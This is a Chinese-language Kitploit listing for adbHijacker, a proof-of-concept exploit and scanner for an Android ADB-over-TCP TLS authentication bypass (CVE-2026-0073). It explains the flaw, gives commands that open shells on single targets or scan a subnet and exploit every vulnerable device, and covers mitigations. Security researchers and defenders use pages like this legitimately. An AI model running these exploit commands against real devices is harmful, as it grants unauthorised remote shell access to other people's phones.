Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
adbHijacker — 针对 Android 11+ 设备上 CVE-2026-0073 的 PoC 工具,可在任何未修补且启用 adb over tcp 的设备上实现即时零点击 RCE。 | Kitploit
工具/GitHubGitHub/unnaim/adbhijacker
Android安全侦察漏洞分析漏洞利用网络安全渗透测试移动安全远程访问工具
GitHubunnaim/adbhijacker

adbHijacker

针对 Android 11+ 设备上 CVE-2026-0073 的 PoC 工具,可在任何未修补且启用 adb over tcp 的设备上实现即时零点击 RCE。

查看仓库
72204个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-0073 — Android ADB TLS 认证绕过

针对 CVE-2026-0073 的概念验证漏洞利用程序和网络扫描器。该漏洞是 Android adbd 的 ADB-over-TCP 认证路径中一个严重的零点击、无交互远程代码执行漏洞。

该漏洞是 adbd_tls_verify_cert()(daemon/auth.cpp)中的一个逻辑缺陷,其中 EVP_PKEY_cmp() 被当作布尔谓词使用。当存储的 RSA 密钥与非 RSA TLS 客户端证书(EC P-256 或 Ed25519)进行比较时,该 API 返回 -1(类型不匹配),而 -1 在 C/C++ 中为真值。这会将跨算法不匹配提升为成功的主机密钥匹配——从而完全绕过认证。

技术细节来自 BARGHEST。
基础 PoC 代码源自 SecTestAnnaQuinn。
已在 Android 安全公告(2026 年 5 月)中修复。


影响

属性详情
攻击向量网络(相邻 / 邻近)
交互无(零点击)
获得的权限shell 用户(uid=2000),SELinux u:r:shell:s0
利用原语通过 ADB 获得远程 shell 访问
CVSS严重(9.8)

从 shell 上下文中,攻击者可以检查系统属性、进程状态、日志、通知;安装和删除软件包;对可调试应用使用 run-as;并为进一步利用做准备。


文件

文件用途
adb_tls_auth_bypass.py单目标漏洞利用 PoC(原作者 SecTestAnnaQuinn,已修补校验和)
adbt_scanner.py网络扫描器——发现易受攻击的设备并加以利用
requirements.txtPython 依赖项

前提条件(目标设备)

要使漏洞利用成功,目标 Android 设备必须满足:

  1. 已启用开发者选项
  2. 已启用无线调试或 ADB-over-TCP(平台 adbd TCP 服务)
  3. 在 /data/misc/adb/adb_keys 中至少有一个先前配对过的 RSA 主机密钥
  4. 网络可达 ADB TCP 端口(默认 5555)

安装

root@kitploit:~
# 创建虚拟环境
uv venv

# 激活虚拟环境
source .venv/bin/activate

# 安装依赖项
uv pip install -r requirements.txt

依赖项:

当可选软件包缺失时,扫描器会优雅降级——它会发出警告并回退到替代方法(系统 ip 命令、nmap、TCP 连接扫描)。


使用方法

模式 0 — 直接单目标利用

直接攻击已知的易受攻击设备。

root@kitploit:~
python3 adb_tls_auth_bypass.py 192.168.1.42              # 交互式 shell
python3 adb_tls_auth_bypass.py 192.168.1.42 5555 --cmd "id"

或通过扫描器:

root@kitploit:~
python3 adbt_scanner.py --host 192.168.1.42                # 交互式 shell
python3 adbt_scanner.py --host 192.168.1.42 --cmd "id; getprop ro.product.model"
python3 adbt_scanner.py --host 192.168.1.42 --port 5580 --cmd "whoami"

模式 1 — 扫描网络、识别、利用

扫描本地网络以发现易受攻击的设备,并利用所有确认的目标。

root@kitploit:~
# 完整扫描:mDNS → ARP → 端口扫描 → ADB 探测 → 利用
python3 adbt_scanner.py --scan

# 在所有易受攻击的设备上运行特定命令
python3 adbt_scanner.py --scan --cmd "id; getprop ro.build.version.security_patch"

# 仅侦察——发现但不利用
python3 adbt_scanner.py --scan --no-exploit

# 扫描多个端口
python3 adbt_scanner.py --scan --ports 5555,5580,5037

# 覆盖检测到的子网(多宿主主机、特定范围)
python3 adbt_scanner.py --scan --subnet 192.168.2.0/24

# 为慢速网络调整超时
python3 adbt_scanner.py --scan --connect-timeout 5 --probe-timeout 10

# 延长 mDNS 监听窗口
python3 adbt_scanner.py --scan --mdns-timeout 60

# 跳过特定发现阶段
python3 adbt_scanner.py --scan --no-mdns    # 跳过 mDNS,仅 ARP
python3 adbt_scanner.py --scan --no-arp     # 跳过 ARP,仅 mDNS

扫描器 CLI 参考

root@kitploit:~
--scan                    扫描网络以发现易受攻击的设备并加以利用
--host HOST               直接单目标利用
--port PORT               --host 模式的 ADB 端口(默认:5555)
--cmd COMMAND             要运行的 shell 命令
-v, --verbose             详细日志输出

--mdns-timeout SECONDS    mDNS 监听时长(默认:30)
--ports PORTS             --scan 模式下的逗号分隔端口(默认:5555)
--subnet CIDR             覆盖检测到的子网(例如 192.168.2.0/24)
--connect-timeout SECONDS TCP 连接超时(默认:2.0)
--probe-timeout SECONDS   ADB 探测超时(默认:3.0)
--arp-timeout SECONDS     ARP 扫描超时(默认:3)
--no-mdns                 跳过 mDNS 发现
--no-arp                  跳过 ARP 扫描 + 端口扫描
--no-exploit              在 ADB 协议探测阶段后停止

发现流程

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│ 1. 子网检测    — netifaces → ip route → socket 技巧        │
│ 2. mDNS 监听器 — _adb-tls-connect._tcp(默认 30 秒)       │
│ 3. ARP 扫描    — scapy.arping → nmap -sn                   │
│ 4. 端口扫描    — 对每个主机:端口进行 TCP 连接              │
│ 5. ADB 协议探测 — 发送 CNXN,分类响应                       │
│                                                             │
│    STLS   → 易受攻击(继续利用)                            │
│    AUTH   → 传统 ADB 认证(不涉及此 CVE)                   │
│    CNXN   → 开放,无需认证(已可访问)                      │
│    NO_ADB → 不是 ADB 服务                                   │
│                                                             │
│ 6. 利用        — TLS 升级 → 认证绕过 → shell               │
└─────────────────────────────────────────────────────────────┘

mDNS 是最准确的识别方法:当无线调试已配对时,Android 会明确广播 _adb-tls-connect._tcp。ARP 扫描 + 端口扫描作为兜底方案。


利用机制

root@kitploit:~
阶段 1 — 明文 ADB
  客户端 → CNXN(payload="host::features=...")
  设备 → STLS  (要求升级到 TLS)

阶段 2 — 使用跨算法客户端证书的 TLS 1.3
  客户端 → STLS 回复
  客户端 → TLS 1.3 握手 + EC P-256 客户端证书
  设备调用 adbd_tls_verify_cert():
    known_evp = 来自 /data/misc/adb/adb_keys 的 RSA 密钥
    evp_pkey  = 来自客户端证书的 EC P-256 密钥
    EVP_PKEY_cmp(known_evp, evp_pkey) → -1(类型不匹配)
    if (-1) → verified = true   ← 缺陷:-1 为真值

阶段 3 — TLS 后的 ADB 服务层
  客户端排空设备 CNXN(传输已在线)
  不发送主机 CNXN(会触发 handle_new_connection 踢出)
  客户端 → OPEN(local_id, window=32MB, payload="shell:\x00")
  设备 → OKAY  → shell 流已建立

威胁模型

直接网络暴露

  • 在不受信任的网络(咖啡店、办公室、会议)上保持无线调试开启
  • 端口 5555 上暴露于互联网的 ADB(在暴露研究中仅在韩国就观察到超过 10,000 台设备)

恶意软件辅助的状态创建

  • 设备上的恶意软件使用无障碍服务启用开发者选项、激活无线调试并配对主机密钥——为网络对等方远程利用设备做好准备

局限性

  • 非 root。 该漏洞利用提供 shell(uid=2000)上下文。内核入侵、root 访问和硬件支持的密钥库密钥需要额外的提权。
  • 需要已配对的密钥。 目标必须在 /data/misc/adb/adb_keys 中至少有一个 RSA 主机密钥。刚重置且已启用无线调试但从未配对的设备不易受攻击。
  • 需要 STLS 路径。 通过传统(非 TLS)机制提供 ADB-over-TCP 服务的设备会响应 AUTH 而非 STLS,不受此 CVE 影响。
  • 已修补的设备免疫。 2026 年 5 月 Android 安全公告包含一项修复,将 EVP_PKEY_cmp 检查改为要求精确的 == 1 返回值。

缓解措施

  • 应用补丁。
  • 在不需要时禁用开发者选项。
  • 禁用无线调试。
  • 不要将 ADB 暴露到本地可信网络之外。

参考

  • Android 安全公告 — 2026 年 5 月
  • BARGHEST 技术分析
  • Android 致谢
  • BoringSSL 提交 — EVP_PKEY_cmp 返回值规范化
  • Morpheus 间谍软件报告 — Osservatorio Nessuno
  • MESH — BARGHEST 的 Android 安全工具

免责声明

本软件仅供教育和授权安全研究目的使用。本仓库中的工具和代码旨在帮助安全专业人员、研究人员和设备所有者:

  • 在协议层面理解 CVE-2026-0073 的工作原理
  • 审计和评估自己的设备和网络
  • 开发和测试缓解措施

您不得使用本软件:

  • 针对任何您不拥有或没有明确书面许可进行测试的设备或网络
  • 用于任何非法目的或违反适用法律的行为
  • 未经授权访问、修改或窃取数据

在大多数司法管辖区,未经授权访问计算机系统属于违法行为,可能导致刑事和民事处罚。作者和贡献者对本软件的使用不当、损害或由此产生的法律后果不承担任何责任。

负责任地使用。了解您的目标。获得许可。


许可证

CC0 1.0 通用 — 不保留任何权利。

在法律允许的范围内,作者已放弃对本作品的所有版权及相关或邻接权利。

下载工具
软件包使用者必需?
cryptography两个脚本(EC 证书生成、TLS)是
netifaces扫描器(子网检测)推荐
zeroconf扫描器(mDNS 发现)推荐
scapy扫描器(ARP 扫描)推荐